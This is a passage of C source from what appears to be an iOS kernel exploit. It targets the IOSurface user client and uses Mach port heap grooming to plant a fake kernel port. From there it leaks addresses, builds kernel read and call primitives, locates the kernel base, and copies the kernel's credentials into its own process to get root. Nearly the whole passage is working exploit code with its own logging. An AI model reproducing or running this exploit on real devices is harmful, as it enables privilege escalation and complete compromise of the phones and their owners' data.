dict_small[3] = kOSSerializeEndCollection | kOSSerializeArray | 1;
793
dict_small[4] = kOSSerializeEndCollection | kOSSerializeDictionary | 1;
794
dict_small[5] = kOSSerializeSymbol | 5;
795
// [6] later
796
dict_small[7] = 0x0; // null terminator
797
dict_small[8] = kOSSerializeEndCollection | kOSSerializeString | (pagesize - 1);
798
799
uint32_t dummy = 0;
800
size = sizeof(dummy);
801
ret = IOConnectCallStructMethod(client, IOSURFACE_SET_VALUE, dict_prep, dictsz_prep, &dummy, &size);
802
if(ret != KERN_SUCCESS)
803
{
804
LOG("setValue(prep): %s", mach_error_string(ret));
805
goto out;
806
}
807
808
/********** ********** black magic ********** **********/
809
810
ret = _kernelrpc_mach_port_allocate_trap(self, MACH_PORT_RIGHT_RECEIVE, &stuffport);
811
LOG("stuffport: %x, %s", stuffport, mach_error_string(ret));
812
if(ret != KERN_SUCCESS || !MACH_PORT_VALID(stuffport))
813
{
814
goto out;
815
}
816
817
ret = _kernelrpc_mach_port_insert_right_trap(self, stuffport, stuffport, MACH_MSG_TYPE_MAKE_SEND);
818
LOG("mach_port_insert_right: %s", mach_error_string(ret));
819
if(ret != KERN_SUCCESS)
820
{
821
goto out;
822
}
823
824
ret = _kernelrpc_mach_port_allocate_trap(self, MACH_PORT_RIGHT_RECEIVE, &realport);
825
LOG("realport: %x, %s", realport, mach_error_string(ret));
826
if(ret != KERN_SUCCESS || !MACH_PORT_VALID(realport))
827
{
828
goto out;
829
}
830
831
sched_yield();
832
// Clean out full pages already in freelists
833
ret = my_mach_zone_force_gc(host);
834
if(ret != KERN_SUCCESS)
835
{
836
LOG("mach_zone_force_gc: %s", mach_error_string(ret));
837
goto out;
838
}
839
840
for(size_t i = 0; i < NUM_BEFORE; ++i)
841
{
842
ret = _kernelrpc_mach_port_allocate_trap(self, MACH_PORT_RIGHT_RECEIVE, &before[i]);
843
if(ret != KERN_SUCCESS)
844
{
845
LOG("mach_port_allocate: %s", mach_error_string(ret));
846
goto out;
847
}
848
}
849
850
ret = _kernelrpc_mach_port_allocate_trap(self, MACH_PORT_RIGHT_RECEIVE, &port);
851
if(ret != KERN_SUCCESS)
852
{
853
LOG("mach_port_allocate: %s", mach_error_string(ret));
854
goto out;
855
}
856
if(!MACH_PORT_VALID(port))
857
{
858
LOG("port: %x", port);
859
goto out;
860
}
861
862
for(size_t i = 0; i < NUM_AFTER; ++i)
863
{
864
ret = _kernelrpc_mach_port_allocate_trap(self, MACH_PORT_RIGHT_RECEIVE, &after[i]);
865
if(ret != KERN_SUCCESS)
866
{
867
LOG("mach_port_allocate: %s", mach_error_string(ret));
868
goto out;
869
}
870
}
871
872
LOG("port: %x", port);
873
874
ret = _kernelrpc_mach_port_insert_right_trap(self, port, port, MACH_MSG_TYPE_MAKE_SEND);
875
LOG("mach_port_insert_right: %s", mach_error_string(ret));
876
if(ret != KERN_SUCCESS)
877
{
878
goto out;
879
}
880
881
#pragma pack(4)
882
typedef struct {
883
mach_msg_base_t base;
884
mach_msg_ool_ports_descriptor_t desc[2];
885
} StuffMsg;
886
#pragma pack()
887
StuffMsg msg;
888
msg.base.header.msgh_bits = MACH_MSGH_BITS_COMPLEX | MACH_MSGH_BITS(MACH_MSG_TYPE_COPY_SEND, MACH_MSG_TYPE_MAKE_SEND_ONCE);
889
msg.base.header.msgh_remote_port = stuffport;
890
msg.base.header.msgh_local_port = MACH_PORT_NULL;
891
msg.base.header.msgh_id = 1234;
892
msg.base.header.msgh_reserved = 0;
893
msg.base.body.msgh_descriptor_count = 2;
894
msg.desc[0].address = before;
895
msg.desc[0].count = NUM_BEFORE;
896
msg.desc[0].disposition = MACH_MSG_TYPE_MOVE_RECEIVE;
897
msg.desc[0].deallocate = FALSE;
898
msg.desc[0].type = MACH_MSG_OOL_PORTS_DESCRIPTOR;
899
msg.desc[1].address = after;
900
msg.desc[1].count = NUM_AFTER;
901
msg.desc[1].disposition = MACH_MSG_TYPE_MOVE_RECEIVE;
902
msg.desc[1].deallocate = FALSE;
903
msg.desc[1].type = MACH_MSG_OOL_PORTS_DESCRIPTOR;
904
ret = mach_msg(&msg.base.header, MACH_SEND_MSG, (mach_msg_size_t)sizeof(msg), 0, 0, MACH_MSG_TIMEOUT_NONE, MACH_PORT_NULL);
905
LOG("mach_msg: %s", mach_error_string(ret));
906
if(ret != KERN_SUCCESS)
907
{
908
goto out;
909
}
910
911
for(size_t i = 0; i < NUM_BEFORE; ++i)
912
{
913
RELEASE_PORT(before[i]);
914
}
915
for(size_t i = 0; i < NUM_AFTER; ++i)
916
{
917
RELEASE_PORT(after[i]);
918
}
919
920
#if 0
921
uint32_t dict[DATA_SIZE / sizeof(uint32_t) + 7] =
922
{
923
// Some header or something
924
surface.data.id,
925
0x0,
926
927
kOSSerializeMagic,
928
kOSSerializeEndCollection | kOSSerializeArray | 2,
929
930
kOSSerializeString | (DATA_SIZE - 1),
931
};
932
dict[DATA_SIZE / sizeof(uint32_t) + 5] = kOSSerializeEndCollection | kOSSerializeString | 4;
933
934
// ipc.ports zone uses 0x3000 allocation chunks, but hardware page size before A9
935
// is actually 0x1000, so references to our reallocated memory may be shifted
936
// by (0x1000 % sizeof(kport_t))
937
kport_t triple_kport =
938
{
939
.ip_lock =
940
{
941
.data = 0x0,
942
.type = 0x11,
943
},
944
#ifdef __LP64__
945
.ip_messages =
946
{
947
.port =
948
{
949
.waitq =
950
{
951
.waitq_queue =
952
{
953
.next = 0x0,
954
.prev = 0x11,
955
}
956
},
957
},
958
},
959
.ip_nsrequest = 0x0,
960
.ip_pdrequest = 0x11,
961
#endif
962
};
963
for(uintptr_t ptr = (uintptr_t)&dict[5], end = (uintptr_t)&dict[5] + DATA_SIZE; ptr + sizeof(kport_t) <= end; ptr += sizeof(kport_t))
964
{
965
UNALIGNED_COPY(&triple_kport, ptr, sizeof(kport_t));
966
}
967
#endif
968
969
// There seems to be some weird asynchronity with freeing on IOConnectCallAsyncStructMethod,
970
// which sucks. To work around it, I register the port to be freed on my own task (thus increasing refs),
971
// sleep after the connect call and register again, thus releasing the reference synchronously.
972
ret = mach_ports_register(self, &port, 1);
973
LOG("mach_ports_register: %s", mach_error_string(ret));
974
if(ret != KERN_SUCCESS)
975
{
976
goto out;
977
}
978
979
uint64_t ref = 0;
980
uint64_t in[3] = { 0, 0x666, 0 };
981
IOConnectCallAsyncStructMethod(client, 17, realport, &ref, 1, in, sizeof(in), NULL, NULL);
982
IOConnectCallAsyncStructMethod(client, 17, port, &ref, 1, in, sizeof(in), NULL, NULL);
983
984
LOG("%s", "herp derp");
985
usleep(100000);
986
sched_yield();
987
ret = mach_ports_register(self, &client, 1); // gonna use that later
988
if(ret != KERN_SUCCESS)
989
{
990
LOG("mach_ports_register: %s", mach_error_string(ret));
991
goto out;
992
}
993
994
// Prevent cleanup
995
fakeport = port;
996
port = MACH_PORT_NULL;
997
998
// Release port with ool port refs
999
RELEASE_PORT(stuffport);
1000
1001
ret = my_mach_zone_force_gc(host);
1002
if(ret != KERN_SUCCESS)
1003
{
1004
LOG("mach_zone_force_gc: %s", mach_error_string(ret));
1005
goto out;
1006
}
1007
1008
#if 0
1009
for(uint32_t i = 0; i < NUM_DATA; ++i)
1010
{
1011
dict[DATA_SIZE / sizeof(uint32_t) + 6] = transpose(i);
1012
kport_t *dptr = (kport_t*)&dict[5];
1013
for(size_t j = 0; j < DATA_SIZE / sizeof(kport_t); ++j)
1014
{
1015
*(((volatile uint32_t*)&dptr[j].ip_context) + 1) = 0x10000000 | (j << 20) | i;
1016
#ifdef __LP64__
1017
*(volatile uint32_t*)&dptr[j].ip_messages.port.pad = 0x20000000 | (j << 20) | i;
1018
*(volatile uint32_t*)&dptr[j].ip_lock.pad = 0x30000000 | (j << 20) | i;
1019
#endif
1020
}
1021
uint32_t dummy = 0;
1022
size = sizeof(dummy);
1023
ret = IOConnectCallStructMethod(client, IOSURFACE_SET_VALUE, dict, sizeof(dict), &dummy, &size);
1024
if(ret != KERN_SUCCESS)
1025
{
1026
LOG("setValue(%u): %s", i, mach_error_string(ret));
1027
goto out;
1028
}
1029
}
1030
#endif
1031
dummy = 0;
1032
size = sizeof(dummy);
1033
ret = IOConnectCallStructMethod(client, IOSURFACE_SET_VALUE, dict_big, dictsz_big, &dummy, &size);
1034
if(ret != KERN_SUCCESS)
1035
{
1036
LOG("setValue(big): %s", mach_error_string(ret));
1037
goto out;
1038
}
1039
1040
uint64_t ctx = 0xffffffff;
1041
ret = my_mach_port_get_context(self, fakeport, &ctx);
1042
LOG("mach_port_get_context: 0x%016llx, %s", ctx, mach_error_string(ret));
1043
if(ret != KERN_SUCCESS)
1044
{
1045
goto out;
1046
}
1047
1048
uint32_t shift_mask = ctx >> 60;
1049
if(shift_mask < 1 || shift_mask > 3)
1050
{
1051
LOG("%s", "Invalid shift mask.");
1052
goto out;
1053
}
1054
#if 0
1055
uint32_t shift_off = sizeof(kport_t) - (((shift_mask - 1) * 0x1000) % sizeof(kport_t));
1056
#endif
1057
uint32_t ins = ((shift_mask - 1) * pagesize) % sizeof(kport_t),
1058
idx = (ctx >> 32) & 0xfffff,
1059
iff = (ctx >> 52) & 0xff;
1060
int64_t fp_off = sizeof(kport_t) * iff - ins;
1061
if(fp_off < 0)
1062
{
1063
--idx;
1064
fp_off += pagesize;
1065
}
1066
uint64_t fakeport_off = (uint64_t)fp_off;
1067
LOG("fakeport offset: 0x%llx", fakeport_off);
1068
#if 0
1069
dict[DATA_SIZE / sizeof(uint32_t) + 6] = transpose(idx);
1070
#endif
1071
uint32_t request[] =
1072
{
1073
// Same header
1074
surface.data.id,
1075
0x0,
1076
1077
#if 0
1078
transpose(idx), // Key
1079
#endif
1080
0x0, // Placeholder
1081
0x0, // Null terminator
1082
};
1083
kport_t kport;
1084
VOLATILE_BZERO32(&kport, sizeof(kport));
1085
kport.ip_bits = 0x80000000; // IO_BITS_ACTIVE | IOT_PORT | IKOT_NONE
1086
kport.ip_references = 100;
1087
kport.ip_lock.type = 0x11;
1088
kport.ip_messages.port.receiver_name = 1;
1089
kport.ip_messages.port.msgcount = MACH_PORT_QLIMIT_KERNEL;
1090
kport.ip_messages.port.qlimit = MACH_PORT_QLIMIT_KERNEL;
1091
kport.ip_srights = 99;
1092
1093
#if 0
1094
// Note to self: must be `(uintptr_t)&dict[5] + DATA_SIZE` and not `ptr + DATA_SIZE`.
1095
for(uintptr_t ptr = (uintptr_t)&dict[5] + shift_off, end = (uintptr_t)&dict[5] + DATA_SIZE; ptr + sizeof(kport_t) <= end; ptr += sizeof(kport_t))
1096
{
1097
UNALIGNED_COPY(&kport, ptr, sizeof(kport_t));
1098
}
1099
#endif
1100
1101
ret = reallocate_fakeport(client, surface.data.id, idx, fakeport_off, pagesize, &kport, dict_small, dictsz_small);
1102
LOG("reallocate_fakeport: %s", mach_error_string(ret));
1103
if(ret != KERN_SUCCESS)
1104
{
1105
goto out;
1106
}
1107
1108
// Register realport on fakeport
1109
mach_port_t notify = MACH_PORT_NULL;
1110
ret = mach_port_request_notification(self, fakeport, MACH_NOTIFY_PORT_DESTROYED, 0, realport, MACH_MSG_TYPE_MAKE_SEND_ONCE, &notify);
1111
LOG("mach_port_request_notification(realport): %x, %s", notify, mach_error_string(ret));
1112
if(ret != KERN_SUCCESS)
1113
{
1114
goto out;
1115
}
1116
1117
#if 0
1118
uint32_t response[4 + (DATA_SIZE / sizeof(uint32_t))] = { 0 };
1119
size = sizeof(response);
1120
ret = IOConnectCallStructMethod(client, IOSURFACE_GET_VALUE, request, sizeof(request), response, &size);
1121
LOG("getValue(%u): 0x%lx bytes, %s", idx, size, mach_error_string(ret));
1122
if(ret != KERN_SUCCESS)
1123
{
1124
goto out;
1125
}
1126
if(size < DATA_SIZE + 0x10)
1127
{
1128
LOG("Response too short.");
1129
goto out;
1130
}
1131
#endif
1132
kport_t myport;
1133
VOLATILE_BZERO32(&myport, sizeof(myport));
1134
ret = readback_fakeport(client, idx, fakeport_off, pagesize, request, sizeof(request), resp, respsz, &myport);
1135
if(ret != KERN_SUCCESS)
1136
{
1137
goto out;
1138
}
1139
1140
#if 0
1141
uint32_t fakeport_off = -1;
1142
kptr_t realport_addr = 0;
1143
for(uintptr_t ptr = (uintptr_t)&response[4] + shift_off, end = (uintptr_t)&response[4] + DATA_SIZE; ptr + sizeof(kport_t) <= end; ptr += sizeof(kport_t))
1144
{
1145
kptr_t val = UNALIGNED_KPTR_DEREF(&((kport_t*)ptr)->ip_pdrequest);
1146
if(val)
1147
{
1148
fakeport_off = ptr - (uintptr_t)&response[4];
1149
realport_addr = val;
1150
break;
1151
}
1152
}
1153
#endif
1154
kptr_t realport_addr = myport.ip_pdrequest;
1155
if(!realport_addr)
1156
{
1157
LOG("%s", "Failed to leak realport address");
1158
goto out;
1159
}
1160
//LOG("realport addr: " ADDR, realport_addr);
1161
#if 0
1162
uintptr_t fakeport_dictbuf = (uintptr_t)&dict[5] + fakeport_off;
1163
#endif
1164
1165
// Register fakeport on itself (and clean ref on realport)
1166
notify = MACH_PORT_NULL;
1167
ret = mach_port_request_notification(self, fakeport, MACH_NOTIFY_PORT_DESTROYED, 0, fakeport, MACH_MSG_TYPE_MAKE_SEND_ONCE, &notify);
1168
LOG("mach_port_request_notification(fakeport): %x, %s", notify, mach_error_string(ret));
1169
if(ret != KERN_SUCCESS)
1170
{
1171
goto out;
1172
}
1173
1174
#if 0
1175
size = sizeof(response);
1176
ret = IOConnectCallStructMethod(client, IOSURFACE_GET_VALUE, request, sizeof(request), response, &size);
1177
LOG("getValue(%u): 0x%lx bytes, %s", idx, size, mach_error_string(ret));
1178
if(ret != KERN_SUCCESS)
1179
{
1180
goto out;
1181
}
1182
if(size < DATA_SIZE + 0x10)
1183
{
1184
LOG("Response too short.");
1185
goto out;
1186
}
1187
kptr_t fakeport_addr = UNALIGNED_KPTR_DEREF(&((kport_t*)((uintptr_t)&response[4] + fakeport_off))->ip_pdrequest);
1188
#endif
1189
ret = readback_fakeport(client, idx, fakeport_off, pagesize, request, sizeof(request), resp, respsz, &myport);
1190
if(ret != KERN_SUCCESS)
1191
{
1192
goto out;
1193
}
1194
kptr_t fakeport_addr = myport.ip_pdrequest;
1195
if(!fakeport_addr)
1196
{
1197
LOG("%s", "Failed to leak fakeport address");
1198
goto out;
1199
}
1200
LOG("fakeport addr: " ADDR, fakeport_addr);
1201
kptr_t fake_addr = fakeport_addr - fakeport_off;
1202
1203
kport_request_t kreq =
1204
{
1205
.notify =
1206
{
1207
.port = 0,
1208
}
1209
};
1210
kport.ip_requests = fakeport_addr + ((uintptr_t)&kport.ip_context - (uintptr_t)&kport) - ((uintptr_t)&kreq.name.size - (uintptr_t)&kreq);
1211
#if 0
1212
UNALIGNED_COPY(&kport, fakeport_dictbuf, sizeof(kport));
1213
1214
ret = reallocate_buf(client, surface.data.id, idx, dict, sizeof(dict));
1215
LOG("reallocate_buf: %s", mach_error_string(ret));
1216
if(ret != KERN_SUCCESS)
1217
{
1218
goto out;
1219
}
1220
#endif
1221
ret = reallocate_fakeport(client, surface.data.id, idx, fakeport_off, pagesize, &kport, dict_small, dictsz_small);
1222
LOG("reallocate_fakeport: %s", mach_error_string(ret));
1223
if(ret != KERN_SUCCESS)
1224
{
1225
goto out;
1226
}
1227
1228
#define KREAD(addr, buf, len) \
1229
do \
1230
{ \
1231
for(size_t i = 0; i < ((len) + sizeof(uint32_t) - 1) / sizeof(uint32_t); ++i) \
1232
{ \
1233
ret = my_mach_port_set_context(self, fakeport, (addr) + i * sizeof(uint32_t)); \
1234
if(ret != KERN_SUCCESS) \
1235
{ \
1236
LOG("mach_port_set_context: %s", mach_error_string(ret)); \
1237
goto out; \
1238
} \
1239
mach_msg_type_number_t outsz = 1; \
1240
ret = mach_port_get_attributes(self, fakeport, MACH_PORT_DNREQUESTS_SIZE, (mach_port_info_t)((uint32_t*)(buf) + i), &outsz); \
1241
if(ret != KERN_SUCCESS) \
1242
{ \
1243
LOG("mach_port_get_attributes: %s", mach_error_string(ret)); \
1244
goto out; \
1245
} \
1246
} \
1247
} while(0)
1248
1249
kptr_t itk_space = 0;
1250
KREAD(realport_addr + ((uintptr_t)&kport.ip_receiver - (uintptr_t)&kport), &itk_space, sizeof(itk_space));
1251
LOG("itk_space: " ADDR, itk_space);
1252
if(!itk_space)
1253
{
1254
goto out;
1255
}
1256
1257
kptr_t self_task = 0;
1258
KREAD(itk_space + off->ipc_space_is_task, &self_task, sizeof(self_task));
1259
LOG("self_task: " ADDR, self_task);
1260
if(!self_task)
1261
{
1262
goto out;
1263
}
1264
1265
kptr_t IOSurfaceRootUserClient_port = 0;
1266
KREAD(self_task + off->task_itk_registered, &IOSurfaceRootUserClient_port, sizeof(IOSurfaceRootUserClient_port));
1267
LOG("IOSurfaceRootUserClient port: " ADDR, IOSurfaceRootUserClient_port);
1268
if(!IOSurfaceRootUserClient_port)
1269
{
1270
goto out;
1271
}
1272
1273
kptr_t IOSurfaceRootUserClient_addr = 0;
1274
KREAD(IOSurfaceRootUserClient_port + ((uintptr_t)&kport.ip_kobject - (uintptr_t)&kport), &IOSurfaceRootUserClient_addr, sizeof(IOSurfaceRootUserClient_addr));
1275
LOG("IOSurfaceRootUserClient addr: " ADDR, IOSurfaceRootUserClient_addr);
1276
if(!IOSurfaceRootUserClient_addr)
1277
{
1278
goto out;
1279
}
1280
1281
kptr_t IOSurfaceRootUserClient_vtab = 0;
1282
KREAD(IOSurfaceRootUserClient_addr, &IOSurfaceRootUserClient_vtab, sizeof(IOSurfaceRootUserClient_vtab));
1283
LOG("IOSurfaceRootUserClient vtab: " ADDR, IOSurfaceRootUserClient_vtab);
1284
if(!IOSurfaceRootUserClient_vtab)
1285
{
1286
goto out;
1287
}
1288
1289
// Unregister IOSurfaceRootUserClient port
1290
ret = mach_ports_register(self, NULL, 0);
1291
LOG("mach_ports_register: %s", mach_error_string(ret));
1292
if(ret != KERN_SUCCESS)
1293
{
1294
goto out;
1295
}
1296
1297
kptr_t vtab[VTAB_SIZE] = { 0 };
1298
KREAD(IOSurfaceRootUserClient_vtab, vtab, sizeof(vtab));
1299
1300
kptr_t kbase = (vtab[off->vtab_get_retain_count] & ~(KERNEL_SLIDE_STEP - 1)) + KERNEL_HEADER_OFFSET;
1301
for(uint32_t magic = 0; 1; kbase -= KERNEL_SLIDE_STEP)
1302
{
1303
KREAD(kbase, &magic, sizeof(magic));
1304
if(magic == KERNEL_MAGIC)
1305
{
1306
break;
1307
}
1308
}
1309
LOG("Kernel base: " ADDR, kbase);
1310
1311
#define OFF(name) (off->name + (kbase - off->base))
1312
1313
kptr_t zone_map_addr = 0;
1314
KREAD(OFF(zone_map), &zone_map_addr, sizeof(zone_map_addr));
1315
LOG("zone_map: " ADDR, zone_map_addr);
1316
if(!zone_map_addr)
1317
{
1318
goto out;
1319
}
1320
1321
#ifdef __LP64__
1322
vtab[off->vtab_get_external_trap_for_index] = OFF(rop_ldr_x0_x0_0x10);
1323
#else
1324
vtab[off->vtab_get_external_trap_for_index] = OFF(rop_ldr_r0_r0_0xc);
1325
#endif
1326
1327
uint32_t faketask_off = fakeport_off < sizeof(ktask_t) ? UINT64_ALIGN_UP(fakeport_off + sizeof(kport_t)) : UINT64_ALIGN_DOWN(fakeport_off - sizeof(ktask_t));
1328
void* faketask_buf = (void*)((uintptr_t)&dict_small[9] + faketask_off);
1329
1330
ktask_t ktask;
1331
VOLATILE_BZERO32(&ktask, sizeof(ktask));
1332
ktask.a.lock.data = 0x0;
1333
ktask.a.lock.type = 0x22;
1334
ktask.a.ref_count = 100;
1335
ktask.a.active = 1;
1336
ktask.a.map = zone_map_addr;
1337
ktask.b.itk_self = 1;
1338
#if 0
1339
UNALIGNED_COPY(&ktask, faketask_buf, sizeof(ktask));
1340
#endif
1341
VOLATILE_BCOPY32(&ktask, faketask_buf, sizeof(ktask));
1342
1343
kport.ip_bits = 0x80000002; // IO_BITS_ACTIVE | IOT_PORT | IKOT_TASK
1344
kport.ip_kobject = fake_addr + faketask_off;
1345
kport.ip_requests = 0;
1346
kport.ip_context = 0;
1347
#if 0
1348
UNALIGNED_COPY(&kport, fakeport_dictbuf, sizeof(kport));
1349
#endif
1350
if(fakeport_off + sizeof(kport_t) > pagesize)
1351
{
1352
size_t sz = pagesize - fakeport_off;
1353
VOLATILE_BCOPY32(&kport, (void*)((uintptr_t)&dict_small[9] + fakeport_off), sz);
1354
VOLATILE_BCOPY32((void*)((uintptr_t)&kport + sz), &dict_small[9], sizeof(kport) - sz);
1355
}
1356
else
1357
{
1358
VOLATILE_BCOPY32(&kport, (void*)((uintptr_t)&dict_small[9] + fakeport_off), sizeof(kport));
1359
}
1360
1361
#undef KREAD
1362
#if 0
1363
ret = reallocate_buf(client, surface.data.id, idx, dict, sizeof(dict));
1364
LOG("reallocate_buf: %s", mach_error_string(ret));
1365
if(ret != KERN_SUCCESS)
1366
{
1367
goto out;
1368
}
1369
#endif
1370
shmemsz = pagesize;
1371
dict_small[6] = transpose(idx);
1372
ret = reallocate_buf(client, surface.data.id, idx, dict_small, dictsz_small);
1373
LOG("reallocate_buf: %s", mach_error_string(ret));
1374
if(ret != KERN_SUCCESS)
1375
{
1376
goto out;
1377
}
1378
if(fakeport_off + sizeof(kport_t) > pagesize)
1379
{
1380
shmemsz *= 2;
1381
dict_small[6] = transpose(idx + 1);
1382
ret = reallocate_buf(client, surface.data.id, idx + 1, dict_small, dictsz_small);
1383
LOG("reallocate_buf: %s", mach_error_string(ret));
1384
if(ret != KERN_SUCCESS)
1385
{
1386
goto out;
1387
}
1388
}
1389
1390
vm_prot_t cur = 0,
1391
max = 0;
1392
sched_yield();
1393
ret = mach_vm_remap(self, &shmem_addr, shmemsz, 0, VM_FLAGS_ANYWHERE | VM_FLAGS_RETURN_DATA_ADDR, fakeport, fake_addr, false, &cur, &max, VM_INHERIT_NONE);
1394
if(ret != KERN_SUCCESS)
1395
{
1396
LOG("mach_vm_remap: %s", mach_error_string(ret));
1397
goto out;
1398
}
1399
*(uint32_t*)shmem_addr = 123; // fault page
1400
LOG("shmem_addr: 0x%016llx", shmem_addr);
1401
volatile kport_t *fakeport_buf = (volatile kport_t*)(shmem_addr + fakeport_off);
1402
1403
uint32_t vtab_off = fakeport_off < sizeof(vtab) ? fakeport_off + sizeof(kport_t) : 0;
1404
vtab_off = UINT64_ALIGN_UP(vtab_off);
1405
kptr_t vtab_addr = fake_addr + vtab_off;
1406
LOG("vtab addr: " ADDR, vtab_addr);
1407
volatile kptr_t *vtab_buf = (volatile kptr_t*)(shmem_addr + vtab_off);
1408
for(volatile kptr_t *src = vtab, *dst = vtab_buf, *end = src + VTAB_SIZE; src < end; *(dst++) = *(src++));
1409
1410
#define MAXRANGES 5
1411
struct
1412
{
1413
uint32_t start;
1414
uint32_t end;
1415
} ranges[MAXRANGES] =
1416
{
1417
{ fakeport_off, (uint32_t)(fakeport_off + sizeof(kport_t)) },
1418
{ vtab_off, (uint32_t)(vtab_off + sizeof(vtab)) },
1419
};
1420
size_t numranges = 2;
1421
#define FIND_RANGE(var, size) \
1422
do \
1423
{ \
1424
if(numranges >= MAXRANGES) \
1425
{ \
1426
/*LOG("FIND_RANGE(" #var "): ranges array too small");*/ \
1427
goto out; \
1428
} \
1429
for(uint32_t i = 0; i < numranges;) \
1430
{ \
1431
uint32_t end = var + (uint32_t)(size); \
1432
if( \
1433
(var >= ranges[i].start && var < ranges[i].end) || \
1434
(end >= ranges[i].start && var < ranges[i].end) \
1435
) \
1436
{ \
1437
var = UINT64_ALIGN_UP(ranges[i].end); \
1438
i = 0; \
1439
continue; \
1440
} \
1441
++i; \
1442
} \
1443
if(var + (uint32_t)(size) > pagesize) \
1444
{ \
1445
/* LOG("FIND_RANGE(" #var ") out of range: 0x%x-0x%x", var, var + (uint32_t)(size));*/ \
1446
goto out; \
1447
} \
1448
ranges[numranges].start = var; \
1449
ranges[numranges].end = var + (uint32_t)(size); \
1450
++numranges; \
1451
} while(0)
1452
1453
typedef volatile union
1454
{
1455
struct {
1456
// IOUserClient fields
1457
kptr_t vtab;
1458
uint32_t refs;
1459
uint32_t pad;
1460
// Gadget stuff
1461
kptr_t trap_ptr;
1462
// IOExternalTrap fields
1463
kptr_t obj;
1464
kptr_t func;
1465
uint32_t break_stuff; // idk wtf this field does, but it has to be zero or iokit_user_client_trap does some weird pointer mashing
1466
// OSSerializer::serialize
1467
kptr_t indirect[3];
1468
} a;
1469
struct {
1470
char pad[OFFSET_IOUSERCLIENT_IPC];
1471
int32_t __ipc;
1472
} b;
1473
} kobj_t;
1474
1475
uint32_t fakeobj_off = 0;
1476
FIND_RANGE(fakeobj_off, sizeof(kobj_t));
1477
kptr_t fakeobj_addr = fake_addr + fakeobj_off;
1478
LOG("fakeobj addr: " ADDR, fakeobj_addr);
1479
volatile kobj_t *fakeobj_buf = (volatile kobj_t*)(shmem_addr + fakeobj_off);
1480
VOLATILE_BZERO32(fakeobj_buf, sizeof(kobj_t));
1481
1482
fakeobj_buf->a.vtab = vtab_addr;
1483
fakeobj_buf->a.refs = 100;
1484
fakeobj_buf->a.trap_ptr = fakeobj_addr + ((uintptr_t)&fakeobj_buf->a.obj - (uintptr_t)fakeobj_buf);
1485
fakeobj_buf->a.break_stuff = 0;
1486
fakeobj_buf->b.__ipc = 100;
1487
1488
fakeport_buf->ip_bits = 0x8000001d; // IO_BITS_ACTIVE | IOT_PORT | IKOT_IOKIT_CONNECT
1489
fakeport_buf->ip_kobject = fakeobj_addr;
1490
1491
// First arg to KCALL can't be == 0, so we need KCALL_ZERO which indirects through OSSerializer::serialize.
1492
// That way it can take way less arguments, but well, it can pass zero as first arg.
1493
#define KCALL(addr, x0, x1, x2, x3, x4, x5, x6) \
1494
( \
1495
fakeobj_buf->a.obj = (kptr_t)(x0), \
1496
fakeobj_buf->a.func = (kptr_t)(addr), \
1497
(kptr_t)IOConnectTrap6(fakeport, 0, (kptr_t)(x1), (kptr_t)(x2), (kptr_t)(x3), (kptr_t)(x4), (kptr_t)(x5), (kptr_t)(x6)) \
1498
)
1499
#define KCALL_ZERO(addr, x0, x1, x2) \
1500
( \
1501
fakeobj_buf->a.obj = fakeobj_addr + ((uintptr_t)&fakeobj_buf->a.indirect - (uintptr_t)fakeobj_buf) - 2 * sizeof(kptr_t), \
1502
fakeobj_buf->a.func = OFF(osserializer_serialize), \
1503
fakeobj_buf->a.indirect[0] = (x0), \
1504
fakeobj_buf->a.indirect[1] = (x1), \
1505
fakeobj_buf->a.indirect[2] = (addr), \
1506
(kptr_t)IOConnectTrap6(fakeport, 0, (kptr_t)(x2), 0, 0, 0, 0, 0) \
1507
)
1508
kptr_t kernel_task_addr = 0;
1509
int r = KCALL(OFF(copyout), OFF(kernel_task), &kernel_task_addr, sizeof(kernel_task_addr), 0, 0, 0, 0);
1510
LOG("kernel_task addr: " ADDR ", %s, %s", kernel_task_addr, errstr(r), mach_error_string(r));
1511
if(r != 0 || !kernel_task_addr)
1512
{
1513
goto out;
1514
}
1515
1516
kptr_t kernproc_addr = 0;
1517
r = KCALL(OFF(copyout), kernel_task_addr + off->task_bsd_info, &kernproc_addr, sizeof(kernproc_addr), 0, 0, 0, 0);
1518
LOG("kernproc addr: " ADDR ", %s, %s", kernproc_addr, errstr(r), mach_error_string(r));
1519
if(r != 0 || !kernproc_addr)
1520
{
1521
goto out;
1522
}
1523
1524
kptr_t kern_ucred = 0;
1525
r = KCALL(OFF(copyout), kernproc_addr + off->proc_ucred, &kern_ucred, sizeof(kern_ucred), 0, 0, 0, 0);
1526
LOG("kern_ucred: " ADDR ", %s, %s", kern_ucred, errstr(r), mach_error_string(r));
1527
if(r != 0 || !kern_ucred)
1528
{
1529
goto out;
1530
}
1531
1532
kptr_t self_proc = 0;
1533
r = KCALL(OFF(copyout), self_task + off->task_bsd_info, &self_proc, sizeof(self_proc), 0, 0, 0, 0);
1534
LOG("self_proc: " ADDR ", %s, %s", self_proc, errstr(r), mach_error_string(r));
1535
if(r != 0 || !self_proc)
1536
{
1537
goto out;
1538
}
1539
1540
kptr_t self_ucred = 0;
1541
r = KCALL(OFF(copyout), self_proc + off->proc_ucred, &self_ucred, sizeof(self_ucred), 0, 0, 0, 0);
1542
LOG("self_ucred: " ADDR ", %s, %s", self_ucred, errstr(r), mach_error_string(r));
1543
if(r != 0 || !self_ucred)
1544
{
1545
goto out;
1546
}
1547
1548
int olduid = getuid();
1549
LOG("uid: %u", olduid);
1550
1551
KCALL(OFF(kauth_cred_ref), kern_ucred, 0, 0, 0, 0, 0, 0);
1552
r = KCALL(OFF(copyin), &kern_ucred, self_proc + off->proc_ucred, sizeof(kern_ucred), 0, 0, 0, 0);
1553
LOG("copyin: %s", errstr(r));
1554
if(r != 0 || !self_ucred)
1555
{
1556
goto out;
1557
}
1558
// Note: decreasing the refcount on the old cred causes a panic with "cred reference underflow", so... don't do that.
1559
LOG("%s", "stole the kernel's credentials");
1560
setuid(0); // update host port
1561
1562
int newuid = getuid();
1563
LOG("uid: %u", newuid);
1564
1565
if(newuid != olduid)
1566
{
1567
KCALL_ZERO(OFF(chgproccnt), newuid, 1, 0);
1568
KCALL_ZERO(OFF(chgproccnt), olduid, -1, 0);
1569
}
1570
1571
host_t realhost = mach_host_self();
1572
LOG("realhost: %x (host: %x)", realhost, host);
1573
1574
uint32_t zm_task_off = 0;
1575
FIND_RANGE(zm_task_off, sizeof(ktask_t));
1576
kptr_t zm_task_addr = fake_addr + zm_task_off;
1577
LOG("zm_task addr: " ADDR, zm_task_addr);
1578
volatile ktask_t *zm_task_buf = (volatile ktask_t*)(shmem_addr + zm_task_off);
1579
VOLATILE_BZERO32(zm_task_buf, sizeof(ktask_t));
1580
1581
